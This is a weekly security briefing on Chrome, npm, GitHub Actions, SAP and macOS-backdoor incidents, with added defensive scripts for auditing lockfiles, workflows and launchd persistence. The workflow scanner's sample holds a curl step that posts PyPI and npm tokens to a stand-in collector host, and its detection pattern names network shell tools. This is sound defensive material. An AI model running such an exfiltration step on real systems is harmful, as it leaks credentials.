Cyber Security Weekly Briefing, 6-12 September

September 12, 2025

New bugs patched in Chrome 140

Google has released Chrome 140 (140.0.7339.80/81 for Windows and Mac, 140.0.7339.80 for Linux), fixing six security vulnerabilities. The most severe, CVE-2025-9864 (CVSSv3 8.8 according to CISA), is a use-after-free in the V8 JavaScript engine: a crafted web page that triggers it could achieve remote code execution, with the attendant risk of data theft or further system compromise.

Other vulnerabilities of varying severity were also fixed: CVE-2025-9865 (CVSSv3 5.4 according to CISA, inappropriate implementation in the toolbar), CVE-2025-9866 (CVSSv3 8.8 according to CISA, a flaw in the extensions system) and CVE-2025-9867 (CVSSv3 5.4 according to CISA, a flaw in the downloads component). No public PoC or known in-the-wild exploitation had been reported at the time of writing.

Google recommends updating Chrome immediately to mitigate the remote code execution risk and the other issues. Note that the update only takes effect once the browser is relaunched; a downloaded but unapplied update leaves the old, vulnerable build running.

More info

npm attack: packages with 2.6 billion weekly downloads compromised to steal cryptocurrency

A supply chain attack compromised npm packages with a combined total of more than 2.6 billion downloads per week after a maintainer's credentials were stolen through phishing. The affected maintainer, Josh Junon (qix), confirmed that he had fallen for a fake email impersonating npmjs.com, which let the attackers take over his account and publish malicious versions of his packages.

The malicious versions carried code injected into the packages' index.js that, once bundled into a web page, hooks the browser's network and wallet APIs and rewrites cryptocurrency transactions so that funds go to attacker-controlled wallets. The payload only activates in a browser context and targets Ethereum, Bitcoin, Solana, Tron, Litecoin and Bitcoin Cash, so the exposure is in front-end bundles built from the poisoned versions during the window they were live. Affected packages include debug, chalk, strip-ansi and ansi-styles, all with massive weekly download counts. The incident is the latest in a series of recent attacks against widely used JavaScript libraries.
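The practical question for any team consuming these packages is whether a poisoned version reached a lockfile. The script below is an added example, not code from the advisory or from npm: it walks the `packages` map of a `package-lock.json` (lockfileVersion 2 or 3), including nested copies under other dependencies, and reports every installed version that appears in a compromised-versions list. The `COMPROMISED` table and the sample lockfile are constructed for demonstration; replace the table with the IOC list published for the incident before relying on the result.

```python
"""Audit a package-lock.json (lockfileVersion 2/3) against a list of
known-compromised npm package versions.

Added example, not code from the advisory or from npm. The COMPROMISED table
is a constructed sample: verify it against the published IOC list.
"""
import json

# Constructed sample: package -> compromised versions. Replace with the
# published IOC list; do not treat these entries as authoritative.
COMPROMISED = {
    "chalk": {"5.6.1"},
    "debug": {"4.4.2"},
    "strip-ansi": {"7.1.1"},
    "ansi-styles": {"6.2.2"},
}


def package_name(lock_key):
    """Map a lockfile 'packages' key to the npm package name.

    Keys look like 'node_modules/chalk' or
    'node_modules/foo/node_modules/@scope/pkg'; the name is whatever follows
    the last 'node_modules/' segment, so scoped names keep both parts.
    """
    marker = "node_modules/"
    idx = lock_key.rfind(marker)
    return lock_key[idx + len(marker):] if idx != -1 else lock_key


def find_compromised(lock_text, compromised=COMPROMISED):
    """Return sorted (lock_key, name, version) tuples for every installed copy
    of a compromised version, nested duplicates included."""
    lock = json.loads(lock_text)
    hits = []
    for key, meta in lock.get("packages", {}).items():
        if not key:  # the root project entry has an empty key
            continue
        name = package_name(key)
        version = meta.get("version")
        if version in compromised.get(name, set()):
            hits.append((key, name, version))
    return sorted(hits)


# Constructed lockfile: a clean top-level chalk and debug, a poisoned
# strip-ansi, and a poisoned debug nested under express.
SAMPLE_LOCK = json.dumps({
    "name": "demo-app",
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "demo-app", "version": "1.0.0"},
        "node_modules/chalk": {"version": "5.3.0"},
        "node_modules/debug": {"version": "4.3.7"},
        "node_modules/strip-ansi": {"version": "7.1.1"},
        "node_modules/express/node_modules/debug": {"version": "4.4.2"},
    },
})

if __name__ == "__main__":
    for key, name, version in find_compromised(SAMPLE_LOCK):
        print(f"COMPROMISED {name}@{version} at {key}")
```

Run it against the real lockfile with `find_compromised(open("package-lock.json").read())`. The nested-copy case matters: a clean top-level `debug` does not mean a poisoned one is absent further down the tree, which is why the scan keys on every `node_modules/` entry rather than on direct dependencies.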

More info

GhostAction campaign on GitHub: massive theft of 3,325 credentials in 817 repositories

GitGuardian has uncovered GhostAction, a widespread supply chain campaign that compromised 817 GitHub repositories belonging to 327 users. The attackers injected malicious workflows that exfiltrated secrets via HTTP requests to a server under their control, stealing 3,325 credentials in total, including PyPI, npm, DockerHub and GitHub tokens as well as cloud service keys.

The attack was first spotted in the FastUUID project, where a malicious workflow was introduced that exfiltrated the project's PyPI token, although no malicious releases of that package were detected. The investigation revealed the same pattern across many public and private repositories: the attackers identified the secrets referenced by legitimate workflows and added steps that forwarded them to the domain bold-dhawan.45-139-104-115.plesk.page, which remained active until the day of detection. GitGuardian notified the affected owners and the platforms involved (GitHub, PyPI and npm). Removing the injected workflow does not invalidate tokens that already left the runner, so every secret exposed to an affected repository's workflows should be treated as compromised and rotated.
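The pattern described above, a `run` step that combines a `${{ secrets.* }}` expression with an outbound HTTP client, is something a repository owner can scan for without a secrets scanner. The script below is an added example, not GitGuardian's tooling: it extracts every `run:` scalar from workflow text, including `run: |` block scalars, and flags scripts that reference a secret and call a network client against a host outside an allowlist (or against a URL hidden in a variable). The allowlist, the command list and the sample workflow are constructed assumptions; the heuristic deliberately avoids a YAML dependency, so it misses secrets passed only through `env:` and will flag legitimate publish steps to unfamiliar hosts.

```python
"""Heuristic scan of GitHub Actions workflow text for 'run' steps that feed a
repository secret to an outbound network command, the exfiltration pattern
described for GhostAction.

Added example, not GitGuardian's tooling. Line-based so it needs no YAML
library; it misses secrets passed only via 'env:' and flags legitimate
publish steps to unknown hosts, so treat hits as triage leads.
"""
import re

SECRET_REF = re.compile(r"\$\{\{\s*secrets\.([A-Za-z0-9_]+)\s*\}\}")
NET_CMD = re.compile(r"\b(curl|wget|nc|ncat|Invoke-WebRequest|iwr)\b")
URL_HOST = re.compile(r"https?://([A-Za-z0-9.\-]+)")
RUN_KEY = re.compile(r"^(\s*)(-\s+)?run:\s*(.*)$")

# Hosts a release job may legitimately talk to (assumption: extend per repo).
ALLOWED_HOSTS = {"api.github.com", "upload.pypi.org", "registry.npmjs.org"}


def run_blocks(workflow_text):
    """Yield (line_number, script) for each 'run:' scalar.

    Handles 'run: <cmd>' and the block form 'run: |' whose body is every
    following line indented deeper than the 'run' key itself.
    """
    lines = workflow_text.splitlines()
    i = 0
    while i < len(lines):
        m = RUN_KEY.match(lines[i])
        if not m:
            i += 1
            continue
        key_col = len(m.group(1)) + len(m.group(2) or "")
        start, value = i + 1, m.group(3).strip()
        body = [] if value in ("|", "|-", ">", ">-") else [value]
        i += 1
        while i < len(lines):
            line = lines[i]
            if line.strip() and len(line) - len(line.lstrip()) <= key_col:
                break
            body.append(line.strip())
            i += 1
        yield start, "\n".join(body)


def suspicious_steps(workflow_text, allowed_hosts=ALLOWED_HOSTS):
    """Return (line, secret_names, unknown_hosts) for run scripts that reference
    a secret and call a network client against a host outside the allowlist,
    or against a URL hidden in a variable (no literal host at all)."""
    findings = []
    for line, script in run_blocks(workflow_text):
        secrets = sorted(set(SECRET_REF.findall(script)))
        if not secrets or not NET_CMD.search(script):
            continue
        literal_hosts = {h.lower() for h in URL_HOST.findall(script)}
        unknown = sorted(literal_hosts - allowed_hosts)
        if unknown or not literal_hosts:
            findings.append((line, secrets, unknown))
    return findings


# Constructed workflow: a clean publish step, an exfil step dressed up as a
# cache warm-up, and a benign notification to an allowlisted host.
SAMPLE_WORKFLOW = r"""name: release
on: [push]
jobs:
  publish:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Publish to PyPI
        run: twine upload dist/*
        env:
          TWINE_PASSWORD: ${{ secrets.PYPI_TOKEN }}
      - name: Cache warm-up
        run: |
          curl -s -X POST https://collector.example.invalid/collect \
            -d "pypi=${{ secrets.PYPI_TOKEN }}&npm=${{ secrets.NPM_TOKEN }}"
      - name: Notify
        run: curl -H "Authorization: token ${{ secrets.GITHUB_TOKEN }}" https://api.github.com/repos/o/r/dispatches
"""

if __name__ == "__main__":
    for line, secrets, hosts in suspicious_steps(SAMPLE_WORKFLOW):
        print(f"line {line}: secrets {secrets} sent to {hosts or ['<non-literal URL>']}")
```

Point it at `.github/workflows/*.yml` in each repository and review every hit by hand; the "Cache warm-up" step in the sample is flagged because it posts two secrets to a host no release job should know about, while the PyPI and GitHub steps pass. A hit in a workflow that was recently modified by an unfamiliar committer is the GhostAction shape.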

More info

SAP fixes three critical bugs in NetWeaver and other enterprise solutions

SAP has released its September security bulletin, fixing 21 vulnerabilities across its products, three of them critical. The most serious, CVE-2025-42944 (CVSSv3 10.0 according to the vendor), is an insecure deserialization flaw in SAP NetWeaver ServerCore 7.50 that allows an unauthenticated attacker to execute operating system commands by sending malicious Java objects.

The second critical flaw, CVE-2025-42922 (CVSSv3 9.9 according to SAP), affects NetWeaver AS Java and allows an authenticated attacker to upload arbitrary files, leading to full system compromise. The third, CVE-2025-42958 (CVSSv3 9.1 according to the vendor), is a missing authentication check that allows unauthorized high-privileged users to read, modify or delete sensitive data.

SAP recommends upgrading to the fixed versions and applying the mitigations without delay: its products underpin business-critical environments and are a priority target for attackers, and unauthenticated deserialization bugs of this kind are typically weaponized quickly once patches reveal the affected component.

More info

ChillyHell: modular macOS backdoor that has evaded Apple's controls since 2021

Jamf Threat Labs has published an in-depth analysis of ChillyHell, a modular macOS backdoor active since 2021 that was identified in a sample uploaded to VirusTotal. The malware is notable for having been signed with a developer certificate and notarized by Apple, which let it pass Gatekeeper and go undetected for years; notarization is an automated malware scan at submission time, not an endorsement, so a clean verdict says nothing about what a signed binary does later. First associated with the UNC4487 group in a private Mandiant report, ChillyHell employs a range of mature techniques: system profiling, persistence through LaunchAgents, LaunchDaemons or injection into shell profiles, timestomping of its dropped files, and a main loop that communicates with its C2 over HTTP or DNS.

Its modules include a reverse shell, self-update, loading of additional binaries and a credential brute-force capability, the latter tied to Kerberos attacks. It also opens a browser window to Google as a decoy so that execution looks benign to the user. Following the disclosure, Apple revoked the developer certificates the attackers had used. Revocation stops new copies from passing Gatekeeper, but it does not remove persistence already in place, so hunting for the LaunchAgent, LaunchDaemon and shell profile artefacts on existing hosts is still required.
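Two of the behaviours above lend themselves to a simple host triage: a launchd job that auto-starts a program from a user-writable location, and a dropped file whose modification time was back-dated. The script below is an added example, not Jamf's detection logic. It parses LaunchAgent/LaunchDaemon plists with the standard library and flags `RunAtLoad`/`KeepAlive` jobs pointing outside a set of trusted prefixes, and it applies the classic timestomp heuristic: `utimes()` and `touch -t` rewrite mtime, but the kernel sets ctime (inode change time) to the moment of the change, so an mtime far older than its ctime means the file was back-dated after it was written. The trusted prefixes, the time gap and the fixture it builds in a temporary directory are constructed assumptions, which also lets it run off-box on any OS.

```python
"""Triage helpers for two ChillyHell behaviours: launchd persistence and
timestomping. Added example, not Jamf's detection logic; it builds its own
fixture in a temp directory so it runs on any OS. The trusted prefixes and
the time gap are assumptions to tune per fleet.
"""
import os
import plistlib
import tempfile
import time

# Auto-started programs outside these prefixes (home dirs, /tmp, /private/var)
# deserve a look. Assumption: extend for managed third-party software.
TRUSTED_PREFIXES = ("/System/", "/usr/", "/Applications/", "/Library/Apple/")


def job_program(job):
    """Executable of a launchd job: 'Program' wins over ProgramArguments[0]."""
    if job.get("Program"):
        return job["Program"]
    args = job.get("ProgramArguments") or []
    return args[0] if args else None


def suspicious_launch_jobs(plist_dir, trusted=TRUSTED_PREFIXES):
    """Return (plist_name, program) for jobs that auto-start (RunAtLoad or
    KeepAlive) a program outside the trusted prefixes; unparseable plists are
    reported too, since malware sometimes ships malformed ones."""
    hits = []
    for name in sorted(os.listdir(plist_dir)):
        if not name.endswith(".plist"):
            continue
        with open(os.path.join(plist_dir, name), "rb") as fh:
            try:
                job = plistlib.load(fh)
            except plistlib.InvalidFileException:
                hits.append((name, "<unparseable plist>"))
                continue
        program = job_program(job)
        autostart = bool(job.get("RunAtLoad")) or bool(job.get("KeepAlive"))
        if autostart and program and not program.startswith(trusted):
            hits.append((name, program))
    return hits


def timestomped(path, min_gap_seconds=86400):
    """utimes()/'touch -t' rewrite mtime, but the kernel sets ctime (inode
    change time) to now; a file whose mtime is far older than its ctime was
    back-dated after the fact. 'cp -p' and tar also preserve mtime, so this
    is a lead, not proof."""
    st = os.stat(path)
    return st.st_ctime - st.st_mtime > min_gap_seconds


def build_fixture(root):
    """Constructed fixture: one Apple-style job, one RunAtLoad job that points
    at a hidden user-writable binary back-dated by a year."""
    agents = os.path.join(root, "LaunchAgents")
    os.makedirs(agents)
    benign = {"Label": "com.example.updater", "RunAtLoad": True,
              "ProgramArguments": ["/usr/libexec/example-updater"]}
    with open(os.path.join(agents, "com.example.updater.plist"), "wb") as fh:
        plistlib.dump(benign, fh)
    dropped = os.path.join(root, ".cache", "helper")
    os.makedirs(os.path.dirname(dropped))
    with open(dropped, "wb") as fh:
        fh.write(b"#!/bin/sh\nexit 0\n")
    bad = {"Label": "com.apple.update.helper", "RunAtLoad": True, "KeepAlive": True,
           "ProgramArguments": [dropped, "--daemon"]}
    bad_plist = os.path.join(agents, "com.apple.update.helper.plist")
    with open(bad_plist, "wb") as fh:
        plistlib.dump(bad, fh)
    year_ago = time.time() - 365 * 86400
    os.utime(dropped, (year_ago, year_ago))  # back-date atime/mtime; ctime stays now
    return agents, dropped, bad_plist


def run_triage():
    """Return (launch job hits, timestomp verdict for the dropped binary,
    timestomp verdict for the plist written moments ago)."""
    with tempfile.TemporaryDirectory() as root:
        agents, dropped, bad_plist = build_fixture(root)
        return suspicious_launch_jobs(agents), timestomped(dropped), timestomped(bad_plist)


if __name__ == "__main__":
    hits, stomped, clean = run_triage()
    for name, program in hits:
        print(f"auto-start job {name} -> {program}")
    print(f"dropped binary timestomped: {stomped}; plist timestomped: {clean}")
```

On a real host, call `suspicious_launch_jobs()` on `~/Library/LaunchAgents`, `/Library/LaunchAgents` and `/Library/LaunchDaemons`, then run `timestomped()` over each flagged program and the plist itself. An Apple-looking label such as the fixture's `com.apple.update.helper` is not evidence of anything on its own; the combination of an auto-start job, a program in a hidden user-writable directory and a back-dated mtime is what makes it worth pulling the sample.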

More info